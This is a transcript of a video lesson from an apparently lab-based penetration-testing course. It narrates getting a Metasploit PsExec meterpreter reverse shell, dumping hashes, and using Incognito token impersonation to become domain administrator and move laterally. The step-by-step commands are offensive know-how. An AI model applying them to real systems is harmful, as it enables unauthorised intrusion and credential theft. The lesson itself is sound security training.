Now, to perform this attack with token impersonation, we're first going to have to use Metasploit. So let's go ahead and just type in MSF console. We're going to load this guy up. And then we're going to go ahead and search for PS exec. We're going to get a shell on the Frank Castle machine or the Punisher machine. So I'm just going to say use exploit Windows SMB PS exec because I have it memorized here. And we're going to say options. And then we're going to set our host, which should be the Punisher machine. Mine's at 57141. We're going to set the SMB domain, which is going to be marvel.local. Set SMB pass as password1. Set SMB user as fcastle. And let's go ahead and show targets once you have that all set up. So I'll say show targets. And I'm going to do a native upload. So we'll set target of 2. I'm going to type options here and I'll stall verbally just for a second so you can catch up if you need to. But we're just making sure that everything is checked with our boxes. We've got the right rhost, we got the right domain, password, user, native upload. Last thing, we're going to want to set the payload here because it's going to try to attack with a x86 payload. So we're going to go ahead and just say Windows x64. And we'll say Meterpreter, reverse, TCP. Options, set the lhost here to ETH0. And now if we type options one more time, it should look good. We've got 192.168.57.139 is the lhost. That is us. Whew. Okay, let's try to run this. And boom, Meterpreter session right off the bat. That's what I love to see. Okay, so now we have the Meterpreter session. We could do all the fun stuff that we already know about, right? We can do a hash dump. We could say get UID. We can make sure we're system. We could say sysinfo, get the system info. We're on the right machine, right architecture, right everything. This is great. Now, there are a few things that we can do in here. One is we can go ahead and we can load a tool. And if you load and double tab, there's a few different things that we can use in here. Now, we can load the tool that we're going to use, which is Incognito. We can also use Kiwi, which is a tool similar to Mimikatz, which is made for dumping passwords. And we're going to talk about Mimikatz here very, very soon. We could also load PowerShell. I love this feature because sometimes if we get into a shell and we try to load PowerShell, like if we go into a shell and we just say PowerShell, whatever, execution policy, bypass, and try to run that, it doesn't always run. This one's nice and neat for us. It's not always like that. So we're going to go ahead and cancel this or exit out of this channel. But we can load PowerShell into this and inject PowerShell as well. So these different features here are really nice. But for this one, I'm going to go ahead and load the Incognito feature. And if we type help, the last thing that we loaded is always at the bottom. So if you ever want to see that, down here, Incognito commands. Now, I've had Incognito come up on interviews before, so this is a special one to note and just to understand what token impersonation is and why it's important. So we have the ability here to impersonate a token. Once we have a token impersonated, we can try to add a user, add group, add local groups. We can do all kinds of fun stuff. For this example, we're just going to go ahead and just try to impersonate a user, okay? And I'm going to go ahead and just list the tokens. And I'm going to do a -u. You could do it by -u or -g for groups. I always like to do it for -u. And you can see sitting on this machine here is Marvel Administrator. So if we want to impersonate this person, all we have to say is impersonate token. And then we're going to go ahead and just say Marvel Administrator, just like that. You want 2 backslashes because of character escaping. Now we've impersonated this user. Go ahead and type shell, who am I? And you see now we are Marvel Administrator. So one thing to note, let's Control C, exit out of this. We can go ahead and say like you want to run hash dump now. It's going to have issues. It's going to say access is denied because we're not actually running as the system of the machine. So if you're ever in this situation, all you have to do is type rev to self. So you're going to revert to your old self, who you came in as. And then now you can run hash dump again and it'll work. So let's do one more proof of concept here. You saw that the administrator was available, and for you, it might have been your other user, right? It's whoever is logged in currently. I didn't instruct you with who to log in as. So on my Windows 10 machine right now, I've got the Marvel administrator logged in. But let's go ahead and just sign in with fcastle, and let's just put in password 1, get Frank all logged in here, and get your other user logged in, whoever it is. If you had somebody you impersonated, go ahead and impersonate a different user here. So now we can come into this again, and we can say list tokens -u for user. And guess who just showed up? Frank Castle. Why? This is a delegate token. Remember, delegate tokens are on login or RDP sessions. So we had a login on this computer. Now we've got this token. This token exists until the computer is rebooted. We can impersonate this user until the computer is rebooted. So we can go ahead and say impersonate token and say Marvel fcastle like this. Should work. Go ahead and say shell. Who am I? Guess what? Now we're Frank Castle. This one is so cool. I love this attack. So that's it. I just want you to get the feel for what you're capable of doing. We just took a user that was just happened to have left a token behind. And this happens a lot. Think of an account or a server that you might log into or get access to, and there is a domain admin who logged into that computer. And servers don't get rebooted that much. So if there's a domain admin on that computer and they don't reboot very often, that token's sitting there until they reboot. So it's just moving laterally, machine to machine, until you find that way to escalate. And this is a potential way to escalate. So that's it. We're going to move on to talk about the mitigation strategies for this. And then we're going to talk about Kerberos, which is one of my favorite attacks. So I'll go ahead and catch you in the next video.